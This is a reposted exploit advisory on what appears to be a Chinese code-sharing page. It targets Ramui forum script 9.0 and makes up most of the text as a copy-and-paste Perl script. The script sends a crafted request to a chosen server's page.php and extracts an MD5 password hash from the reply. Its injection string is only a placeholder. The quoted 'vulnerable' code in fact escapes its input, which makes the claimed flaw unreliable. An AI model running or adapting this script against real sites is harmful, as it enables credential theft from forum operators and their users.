扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 |
# Title: Ramui forum script 9.0 SQL Injection Exploit # Author: bd0rk # Twitter: twitter.com/bd0rk # Vendor: http://www.ramui.com/ # Download: http://ramui.com/forum-script/download-v9.html # Google-Dork: n/a --->Script-Kiddie protection! :) # Direct SQL-Path: n/a --->Script-Kiddie protection! :) # Description: I've found a sql-injection vulnerability in this web-software. # The vulnerable code is in /gb/include/page.php # The problem is the GET-pagename. # An attacker can use this exploitcode for unfiltered sql-queries. #Vuln-Code in /gb/include/page.php: #************************************************************************************************************************************ # <?php # if(isset($_GET['pagename'])){ # $name=$_GET['pagename']; # $query=sprintf("SELECT* FROM ".PREFIX."page WHERE pagename = '%s' AND publish = 'Y'",$xx_con->real_escape_string($name)); # } #************************************************************************************************************************************ # [+]PERL-EXPLOITCODE(Copy&Paste): #!/usr/bin/perl print q{ ++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ + Ramui forum script 9.0 SQL Injection Exploit + ++ +bd0rk || SOH-Crew + ++ +Greetings from cold Germany + ++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++ }; use IO::Socket; print q{ => Insert URL => without ( http ) => }; $server = <STDIN>; chop ($server); print q{ => Insert directory => es: /forum/ - /ramui/ => }; $dir = <STDIN>; chop ($dir); print q{ => User ID => Number: => }; $user = <STDIN>; chop ($user); if (!$ARGV[2]) { } $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "gb/include/page.php?pagename=[sqlInjectionCodeHERE]".$user ; print " => Exploit in process...\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "Exploit failed"; print "Exploit\r\n"; print "in process...\r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "Exploit finished!\r\n\r\n"; while ($answer = <$socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "MD5-Hash is: ".$1."\r\n"; } exit(); } } |
体验盒子
